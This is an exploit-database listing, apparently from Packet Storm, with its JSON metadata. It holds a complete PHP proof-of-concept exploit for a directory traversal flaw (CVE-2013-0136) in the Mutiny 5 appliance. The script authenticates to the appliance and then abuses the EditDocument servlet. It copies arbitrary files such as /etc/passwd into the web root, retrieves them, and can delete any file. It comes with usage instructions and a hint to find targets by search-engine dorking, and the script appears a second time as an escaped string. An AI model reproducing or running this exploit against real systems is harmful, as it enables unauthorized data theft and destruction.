📄 Mutiny 5.0-1.07 Directory Traversal_PACKETSTORM:214910

8.5 / 10

HIGH

AV:N/AC:M/Au:S/C:C/I:C/A:C

Description

Mutiny version 5.0-1.07 directory traversal proof of concept exploit that demonstrates an issue originally discovered in 2013...

Visit Original Source

Basic Information

ID PACKETSTORM:214910

Published Feb 4, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Mutiny 5.0-1.07 directory traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.mutiny.com/downloads/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The code is an exploit written in PHP that targets a vulnerability in the Mutiny 5 Appliance,

allowing an authenticated attacker (i.e. with a username and password) to read or delete any file on the system due to a Directory Traversal vulnerability in the EditDocument servlet.

(Related : https://packetstorm.news/files/id/180894/ Linked CVE numbers: CVE-2013-0136 ) .

[+] save code as poc.php.

[+] Set taget : Line 110.

[+] USage : php poc.php

[+] PayLoad :

<?php

class MutinyExploit {
private $target;
private $username;
private $password;
private $session;

public function __construct($target, $username, $password) {
$this->target = rtrim($target, '/');
$this->username = $username;
$this->password = $password;
}

private function sendRequest($url, $postFields = null, $cookie = null) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

if ($postFields) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);
}

if ($cookie) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: $cookie"]);
}

$response = curl_exec($ch);
curl_close($ch);
return $response;
}

public function login() {
// الحصول على JSESSIONID الأولي
$response = $this->sendRequest("{$this->target}/interface/index.do");
if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
$firstSession = $matches[1];
} else {
die("فشل في الحصول على JSESSIONID الأولي\n");
}

// محاولة تسجيل الدخول
$postFields = "j_username={$this->username}&j_password={$this->password}";
$response = $this->sendRequest("{$this->target}/interface/j_security_check", $postFields, "JSESSIONID=$firstSession");

// التحقق مما إذا كان تسجيل الدخول ناجحًا
if (strpos($response, "interface/index.do") === false) {
die("فشل تسجيل الدخول، تحقق من بيانات الاعتماد\n");
}

// الحصول على JSESSIONID النهائي بعد المصادقة
$response = $this->sendRequest("{$this->target}/interface/index.do", null, "JSESSIONID=$firstSession");
if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {
$this->session = $matches[1];
echo "تم تسجيل الدخول بنجاح\n";
} else {
die("فشل في الحصول على الجلسة بعد تسجيل الدخول\n");
}
}

public function readFile($filePath) {
echo "نسخ الملف إلى موقع ويب يمكن الوصول إليه...\n";
$dstPath = "/usr/jakarta/tomcat/webapps/ROOT/m/";
$postFields = [
'operation' => 'COPY',
'paths[]' => "../../../../{$filePath}%00.txt",
'newPath' => "../../../..{$dstPath}"
];

$response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
if (strpos($response, '{"success":true}') !== false) {
echo "تم نسخ الملف إلى {$dstPath} بنجاح\n";
} else {
die("فشل في نسخ الملف\n");
}

// قراءة الملف
echo "استرجاع محتوى الملف...\n";
$fileContents = $this->sendRequest("{$this->target}/m/" . basename($filePath));
if ($fileContents) {
file_put_contents("extracted_" . basename($filePath), $fileContents);
echo "تم استرجاع الملف وحفظه محليًا\n";
} else {
echo "فشل في استرجاع محتوى الملف\n";
}

// تنظيف الملفات بعد القراءة
$this->deleteFile("{$dstPath}" . basename($filePath));
}

public function deleteFile($filePath) {
echo "حذف الملف {$filePath}\n";
$postFields = [
'operation' => 'DELETE',
'paths[]' => "../../../../{$filePath}"
];

$response = $this->sendRequest("{$this->target}/interface/EditDocument", $postFields, "JSESSIONID={$this->session}");
if (strpos($response, '{"success":true}') !== false) {
echo "تم حذف الملف بنجاح\n";
} else {
echo "فشل في حذف الملف\n";
}
}
}

// استخدام الكود
$exploit = new MutinyExploit("http://target.com", "[email protected]", "password");
$exploit->login();
$exploit->readFile("/etc/passwd"); // مثال على قراءة ملف
// $exploit->deleteFile("/tmp/test.txt"); // حذف ملف (اختياري)

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-04T16:58:47",
    "description": "Mutiny version 5.0-1.07 directory traversal proof of concept exploit that demonstrates an issue originally discovered in 2013...",
    "published": "2026-02-04T00:00:00",
    "modified": "2026-02-04T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Mutiny 5.0-1.07 Directory Traversal",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214910",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2013-0136"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Mutiny 5.0-1.07 directory traversal Vulnerability                                                                           |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.mutiny.com/downloads/                                                                                           |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: The code is an exploit written in PHP that targets a vulnerability in the Mutiny 5 Appliance, \n    \n        allowing an authenticated attacker (i.e. with a username and password) to read or delete any file on the system due to a Directory Traversal vulnerability in the EditDocument servlet.\n       \n       (Related : https://packetstorm.news/files/id/180894/ Linked CVE numbers:\tCVE-2013-0136 ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Set taget : Line 110.\n    \n    [+] USage : php poc.php \n    \n    [+] PayLoad :\n    \n    <?php\n    \n    class MutinyExploit {\n        private $target;\n        private $username;\n        private $password;\n        private $session;\n    \n        public function __construct($target, $username, $password) {\n            $this->target = rtrim($target, '/');\n            $this->username = $username;\n            $this->password = $password;\n        }\n    \n        private function sendRequest($url, $postFields = null, $cookie = null) {\n            $ch = curl_init($url);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\n            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\n    \n            if ($postFields) {\n                curl_setopt($ch, CURLOPT_POST, true);\n                curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields);\n            }\n    \n            if ($cookie) {\n                curl_setopt($ch, CURLOPT_HTTPHEADER, [\"Cookie: $cookie\"]);\n            }\n    \n            $response = curl_exec($ch);\n            curl_close($ch);\n            return $response;\n        }\n    \n        public function login() {\n            // \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 JSESSIONID \u0627\u0644\u0623\u0648\u0644\u064a\n            $response = $this->sendRequest(\"{$this->target}/interface/index.do\");\n            if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {\n                $firstSession = $matches[1];\n            } else {\n                die(\"\u0641\u0634\u0644 \u0641\u064a \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 JSESSIONID \u0627\u0644\u0623\u0648\u0644\u064a\\n\");\n            }\n    \n            // \u0645\u062d\u0627\u0648\u0644\u0629 \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\n            $postFields = \"j_username={$this->username}&j_password={$this->password}\";\n            $response = $this->sendRequest(\"{$this->target}/interface/j_security_check\", $postFields, \"JSESSIONID=$firstSession\");\n    \n            // \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0645\u0627 \u0625\u0630\u0627 \u0643\u0627\u0646 \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644 \u0646\u0627\u062c\u062d\u064b\u0627\n            if (strpos($response, \"interface/index.do\") === false) {\n                die(\"\u0641\u0634\u0644 \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\u060c \u062a\u062d\u0642\u0642 \u0645\u0646 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0639\u062a\u0645\u0627\u062f\\n\");\n            }\n    \n            // \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 JSESSIONID \u0627\u0644\u0646\u0647\u0627\u0626\u064a \u0628\u0639\u062f \u0627\u0644\u0645\u0635\u0627\u062f\u0642\u0629\n            $response = $this->sendRequest(\"{$this->target}/interface/index.do\", null, \"JSESSIONID=$firstSession\");\n            if (preg_match('/JSESSIONID=(.*?);/', $response, $matches)) {\n                $this->session = $matches[1];\n                echo \"\u062a\u0645 \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644 \u0628\u0646\u062c\u0627\u062d\\n\";\n            } else {\n                die(\"\u0641\u0634\u0644 \u0641\u064a \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0627\u0644\u062c\u0644\u0633\u0629 \u0628\u0639\u062f \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\\n\");\n            }\n        }\n    \n        public function readFile($filePath) {\n            echo \"\u0646\u0633\u062e \u0627\u0644\u0645\u0644\u0641 \u0625\u0644\u0649 \u0645\u0648\u0642\u0639 \u0648\u064a\u0628 \u064a\u0645\u0643\u0646 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u064a\u0647...\\n\";\n            $dstPath = \"/usr/jakarta/tomcat/webapps/ROOT/m/\";\n            $postFields = [\n                'operation' => 'COPY',\n                'paths[]' => \"../../../../{$filePath}%00.txt\",\n                'newPath' => \"../../../..{$dstPath}\"\n            ];\n    \n            $response = $this->sendRequest(\"{$this->target}/interface/EditDocument\", $postFields, \"JSESSIONID={$this->session}\");\n            if (strpos($response, '{\"success\":true}') !== false) {\n                echo \"\u062a\u0645 \u0646\u0633\u062e \u0627\u0644\u0645\u0644\u0641 \u0625\u0644\u0649 {$dstPath} \u0628\u0646\u062c\u0627\u062d\\n\";\n            } else {\n                die(\"\u0641\u0634\u0644 \u0641\u064a \u0646\u0633\u062e \u0627\u0644\u0645\u0644\u0641\\n\");\n            }\n    \n            // \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0645\u0644\u0641\n            echo \"\u0627\u0633\u062a\u0631\u062c\u0627\u0639 \u0645\u062d\u062a\u0648\u0649 \u0627\u0644\u0645\u0644\u0641...\\n\";\n            $fileContents = $this->sendRequest(\"{$this->target}/m/\" . basename($filePath));\n            if ($fileContents) {\n                file_put_contents(\"extracted_\" . basename($filePath), $fileContents);\n                echo \"\u062a\u0645 \u0627\u0633\u062a\u0631\u062c\u0627\u0639 \u0627\u0644\u0645\u0644\u0641 \u0648\u062d\u0641\u0638\u0647 \u0645\u062d\u0644\u064a\u064b\u0627\\n\";\n            } else {\n                echo \"\u0641\u0634\u0644 \u0641\u064a \u0627\u0633\u062a\u0631\u062c\u0627\u0639 \u0645\u062d\u062a\u0648\u0649 \u0627\u0644\u0645\u0644\u0641\\n\";\n            }\n    \n            // \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0628\u0639\u062f \u0627\u0644\u0642\u0631\u0627\u0621\u0629\n            $this->deleteFile(\"{$dstPath}\" . basename($filePath));\n        }\n    \n        public function deleteFile($filePath) {\n            echo \"\u062d\u0630\u0641 \u0627\u0644\u0645\u0644\u0641 {$filePath}\\n\";\n            $postFields = [\n                'operation' => 'DELETE',\n                'paths[]' => \"../../../../{$filePath}\"\n            ];\n    \n            $response = $this->sendRequest(\"{$this->target}/interface/EditDocument\", $postFields, \"JSESSIONID={$this->session}\");\n            if (strpos($response, '{\"success\":true}') !== false) {\n                echo \"\u062a\u0645 \u062d\u0630\u0641 \u0627\u0644\u0645\u0644\u0641 \u0628\u0646\u062c\u0627\u062d\\n\";\n            } else {\n                echo \"\u0641\u0634\u0644 \u0641\u064a \u062d\u0630\u0641 \u0627\u0644\u0645\u0644\u0641\\n\";\n            }\n        }\n    }\n    \n    // \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0643\u0648\u062f\n    $exploit = new MutinyExploit(\"http://target.com\", \"[email protected]\", \"password\");\n    $exploit->login();\n    $exploit->readFile(\"/etc/passwd\"); // \u0645\u062b\u0627\u0644 \u0639\u0644\u0649 \u0642\u0631\u0627\u0621\u0629 \u0645\u0644\u0641\n    // $exploit->deleteFile(\"/tmp/test.txt\"); // \u062d\u0630\u0641 \u0645\u0644\u0641 (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\n    \n    ?>\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/214910",
    "cvss": {
        "score": 8.5,
        "severity": "HIGH",
        "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
        "version": "2.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214910/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply